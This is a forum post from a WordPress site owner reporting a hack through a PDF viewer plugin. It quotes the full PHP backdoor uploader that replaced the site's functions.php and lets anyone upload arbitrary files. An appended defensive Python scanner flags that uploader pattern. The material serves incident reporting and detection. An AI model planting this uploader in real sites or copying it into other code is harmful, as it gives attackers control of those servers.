• Hi,

    I have been hacked today 2014-10-05 02:05:05
    I received a mail from ovh.com, who has blocked my site temporarily. The following exe wasn’t authorized: www/wp-content/plugins/pdfjs-viewer-shortcode/web/.nfs0000000001ca104a0000be1d
    So I went on my FTP, deleted the plugin entirely and relaunched the site.

    Functions.php was entirely replaced by the following script:

    <?php
    if(isset($_POST['Submit'])){
        $filedir = "";
        $maxfile = '2000000';
    
        $userfile_name = $_FILES['image']['name'];
        $userfile_tmp = $_FILES['image']['tmp_name'];
        if (isset($_FILES['image']['name'])) {
            $abod = $filedir.$userfile_name;
            @move_uploaded_file($userfile_tmp, $abod);
    
    echo"<center><b>Done ==> $userfile_name</b></center>";
    }
    }
    else{
    echo'
    <form method="POST" action="" enctype="multipart/form-data"><input type="file" name="image"><input type="Submit" name="Submit" value="Submit"></form>';
    }
    ?>

    This script adds (at the top of every page of my site) the possibility for anyone to add some shit to my site.
    The plugin is deleted, the script is deleted, I hope I’m safe now…

    Bye

    https://www.ads-software.com/plugins/pdfjs-viewer-shortcode/

  • The topic ‘have been hacked’ is closed to new replies.
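
A defender's check for the uploader quoted in the post above, as an added example that is not part of the original post: it flags any file containing PHP whose `move_uploaded_file()` destination is built from the client-supplied `$_FILES[...]['name']`, and it walks dotfiles and non-`.php` names too, since the file the host flagged here was a hidden `.nfs…` file. The function names, the sanitizer list and the regex-based variable tracking are assumptions of this example.

```python
import re
import sys
from pathlib import Path

# $_FILES[...]['name'] is the client-chosen file name (not 'tmp_name').
FILES_NAME = re.compile(r"\$_FILES\s*\[[^\]]+\]\s*\[\s*['\"]name['\"]\s*\]")
ASSIGN = re.compile(r"(\$\w+)\s*\.?=(?![=>])\s*([^;]+);")
MOVE = re.compile(r"move_uploaded_file\s*\(\s*[^,]+,\s*([^)]+)\)")
# Assumption: a name passed through these calls is treated as handled.
# They stop path tricks, not dangerous extensions; extend for your code base.
SANITIZERS = ("basename(", "sanitize_file_name(")


def _tainted(expr, tainted):
    """True if expr uses the raw client file name or a variable derived from it."""
    if any(s in expr for s in SANITIZERS):
        return False
    return bool(FILES_NAME.search(expr)) or any(
        re.search(re.escape(v) + r"\b", expr) for v in tainted)


def find_raw_upload_sinks(php_source):
    """Destinations of move_uploaded_file() built from the client file name."""
    tainted = set()
    for var, expr in ASSIGN.findall(php_source):  # assignments in source order
        if _tainted(expr, tainted):
            tainted.add(var)
    return [d.strip() for d in MOVE.findall(php_source) if _tainted(d, tainted)]


def scan_tree(root):
    """Map each file containing PHP to its raw upload sinks, dotfiles included."""
    findings = {}
    for path in Path(root).rglob("*"):
        if not path.is_file():
            continue
        text = path.read_text(errors="ignore")
        if "<?php" in text:
            sinks = find_raw_upload_sinks(text)
            if sinks:
                findings[str(path.relative_to(root))] = sinks
    return findings


if __name__ == "__main__":
    root = sys.argv[1] if len(sys.argv) > 1 else "."
    for name, sinks in scan_tree(root).items():
        print(f"{name}: upload destination from client file name: {sinks}")
```

A hit is a lead for manual review, not a verdict: compare the flagged file against a clean copy of the theme or plugin before deciding what to restore.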